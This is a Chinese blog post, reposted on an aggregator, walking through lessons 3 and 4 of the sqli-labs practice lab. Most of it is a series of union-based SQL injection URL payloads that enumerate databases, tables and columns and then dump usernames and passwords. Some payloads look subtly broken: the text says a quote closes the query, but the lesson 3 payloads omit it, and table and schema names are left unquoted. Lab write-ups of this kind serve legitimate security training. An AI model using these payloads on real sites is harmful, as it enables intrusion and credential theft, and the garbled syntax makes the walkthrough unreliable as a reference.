码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs注入lesson3-4闯关秘籍

时间:2020-02-06 11:09:11      阅读:95      评论:0      收藏:0      [点我收藏+]

标签:第三关   alt   get   错误   方便   image   color   使用   tab   

·lesson 3

与第一二关不同的是,这一关是基于错误的get单引号变形字符型注入

要使用 ‘) 进行闭合  (ps:博主自己理解为字符型注入,是不过是需要加括号进行闭合,适用于博主自己的方便记忆的法子,仅供参考 )

1.判断是否存在注入

?id=1) --+

技术图片

 

 

 2.使用order by 猜测字段数

?id=1) order by 3 --+

技术图片

?id=1) order by 4 --+

技术图片

3.确定显示的字段显示位

?id=1) and 1=2 union select 1,2,3 --+

技术图片

 

 

 4.爆破数据库的版本和数据库名

?id=1) and 1=2 union select 1,version(),database() --+

技术图片

 

 

 5.查看所有数据库

?id=1) and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

技术图片

 

 

 6.根据数据库名,爆破出该数据库中的所有表名

?id=1) and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=security),3 --+

技术图片

 

 

 7.爆破users表中的列名

?id=1) and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=users),3 --+

技术图片

 

 

 8.爆破用户名和密码

?id=1) and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

技术图片

 

 

 

·lesson 4

 这一关跟第三关有所不同,是基于错误的get双引号变形字符型注入

下面博主就直接写出了爆破用户名密码的语句:

?id=1") and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

技术图片

 

sqli-labs注入lesson3-4闯关秘籍

标签:第三关   alt   get   错误   方便   image   color   使用   tab   

原文地址:https://www.cnblogs.com/Ghost-m/p/12267572.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!